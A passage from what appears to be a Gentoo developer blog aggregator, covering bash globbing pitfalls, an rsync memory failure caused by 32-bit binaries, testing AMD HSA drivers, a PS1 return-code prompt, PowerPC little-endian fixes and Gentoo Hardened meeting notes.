It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides a two major facilities that could help you stop mistakes — shopts nullglob and failglob.

The nullglob option is a good choice for a default for your script. After enabling it, failing filename expansions result in no parameters rather than verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"

Without nullglob, the above may actually return a/* if no file matches the pattern. For this reason, you would need to add an additional check for existence of file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match the loop won't be run even once.

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way. Of course, assuming that it doesn't accidentally expand into something already.

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I myself noticed lately is the attempt of using unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"

At a first glance, everything looks fine. ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that words in ${v} are subject to filename expansion. For example, if a lone asterisk would happen to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.

Personally, I dislike the first two since they require set-and-restore magic, and the latter also has the penalty of doing the globbing then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"

While normally read is used to read from files, we can use the here string syntax of bash to feed the variable into it. The -r option disables backslash escape processing that is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like newline). -a words causes it to put the split words into array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
32bit Madness (September 05, 2014, 06:41 UTC)

This week I ran into a funny issue doing backups with rsync:

rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

September 03, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
AMD HSA (September 03, 2014, 06:25 UTC)

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogenous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:

[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./ 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways
These ebuilds can be found here

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included, it mostly works, but appears to go into an infinite loop. Outout looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

August 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Showing return code in PS1 (August 30, 2014, 23:14 UTC)

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

When the PROMPT_COMMMAND variable is defined, then bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet inside my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "

With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos showed me my utter failure in that this can be accomplished with the PS1 variable immediately, without using the overhead of the PROMPT_COMMAND. Just make sure to properly escape the $ sign which I of course forgot in my late-night experiments :-(.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
PowerPC is back (and little endian) (August 30, 2014, 17:32 UTC)

Yesterday I fixed a PowerPC issue since ages, it is an endianess issue, and it is (funny enough) on the little endian flavour of it.


I have some ties with this architecture since my interest on the architecture (and Altivec/VMX in particular) is what made me start contributing to MPlayer while fixing issue on Gentoo and from there hack on the FFmpeg of the time, meet the VLC people, decide to part ways with Michael Niedermayer and with the other main contributors of FFmpeg create Libav. Quite a loong way back in the time.

Big endian, Little Endian

It is a bit surprising that IBM decided to use little endian (since big endian is MUCH nicer for I/O processing such as networking) but they might have their reasons.

PowerPC traditionally always had been both-endian with the ability to switch on the fly between the two (this made having foreign-endian simulators lightly less annoying to manage), but the main endianess had always been big.

This brings us to a quite interesting problem: Some if not most of the PowerPC code had been written thinking in big-endian. Luckily since most of the code wrote was using C intrinsics (Bless to whoever made the Altivec intrinsics not as terrible as the other ones around) it won’t be that hard to recycle most of the code.

More will follow.

August 29, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Hardened august meeting (August 29, 2014, 14:43 UTC)

Another month has passed, so we had another online meeting to discuss the progress within Gentoo Hardened.

Lead elections

The yearly lead elections within Gentoo Hardened were up again. Zorry (Magnus Granberg) was re-elected as project lead so doesn’t need to update his LinkedIn profile yet ;-)


blueness (Anthony G. Basile) has been working on the uclibc stages for some time. Due to the configurable nature of these setups, many /etc/portage files were provided as part of the stages, which shouldn’t happen. Work is on the way to update this accordingly.

For the musl setup, blueness is also rebuilding the stages to use a symbolic link to the dynamic linker (/lib/ as recommended by the musl maintainers.

Kernel and grsecurity with PaX

A bug has been submitted which shows that large binary files (in the bug, a chrome binary with debug information is shown to be more than 2 Gb in size) cannot be pax-mark’ed, with paxctl informing the user that the file is too big. The problem is when the PAX marks are in ELF (as the application mmaps the binary) – users of extended attributes based PaX markings do not have this problem. blueness is working on making things a bit more intelligent, and to fix this.


I have been making a few changes to the SELinux setup:

  • The live ebuilds (those with version 9999 which use the repository policy rather than snapshots of the policies) are now being used as “master” in case of releases: the ebuilds can just be copied to the right version to support the releases. The release script inside the repository is adjusted to reflect this as well.
  • The SELinux eclass now supports two variables, SELINUX_GIT_REPO and SELINUX_GIT_BRANCH, which allows users to use their own repository, and developers to work in specific branches together. By setting the right value in the users’ make.conf switching policy repositories or branches is now a breeze.
  • Another change in the SELinux eclass is that, after the installation of SELinux policies, we will check the reverse dependencies of the policy package and relabel the files of these packages. This allows us to only have RDEPEND dependencies towards the SELinux policy packages (if the application itself does not otherwise link with libselinux), making the dependency tree within the package manager more correct. We still need to update these packages to drop the DEPEND dependency, which is something we will focus on in the next few months.
  • In order to support improved cooperation between SELinux developers in the Gentoo Hardened team – perfinion (Jason Zaman) is in the queue for becoming a new developer in our mids – a coding style for SELinux policies is being drafted up. This is of course based on the coding style of the reference policy, but with some Gentoo specific improvements and more clarifications.
  • perfinion has been working on improving the SELinux support in OpenRC (release 0.13 and higher), making some of the additions that we had to make in the past – such as the selinux_gentoo init script – obsolete.

The meeting also discussed a few bugs in more detail, but if you really want to know, just hang on and wait for the IRC logs ;-) Other usual sections (system integrity and profiles) did not have any notable topics to describe.